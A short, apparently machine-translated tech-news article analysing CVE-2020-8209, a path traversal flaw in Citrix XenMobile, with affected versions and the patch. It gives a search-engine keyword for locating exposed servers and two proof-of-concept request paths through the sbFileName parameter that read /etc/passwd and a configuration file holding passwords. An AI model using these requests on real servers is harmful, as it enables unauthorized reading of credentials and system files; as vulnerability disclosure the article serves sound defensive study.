Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you an example analysis of the CVE-2020-8209 vulnerability in XenMobile. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.

1. Introduction of vulnerabilities

XenMobile is enterprise mobility management software developed by Citrix that allows enterprises to manage employees' mobile devices and applications. The purpose of the software is to increase productivity by allowing employees to work securely on enterprise-owned and personal mobile devices and applications. CVE-2020-8209, path traversal vulnerabilities. This vulnerability allows unauthorized users to read arbitrary files, including configuration files containing passwords. (the software is mostly abroad, but basically few at home.)

2. Vulnerability version

XenMobile server before RP2 10.12

XenMobile server before RP4 10.11

XenMobile server before RP6 10.10

XenMobile servers before 10.9 RP5

3. Loophole recurrence

1. Through the space engine keyword

"XenMobile console"

2.POC authentication vulnerability

/ jsp/help-sb-download.jsp?sbFileName=../etc/passwd

/ jsp/help-sb-download.jsp?sbFileName=../opt/sas/sw/config/sftu.properties

4. Loophole suggestion

The official patch has been removed / opt/sas/sw/tomcat/inst1/webapps/ROOT/jsp/help-sb-download.jsp

The above is an example of the CVE-2020-8209 vulnerability in XenMobile shared by Xiaobian. If you happen to have similar doubts, you might as well refer to the above analysis. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.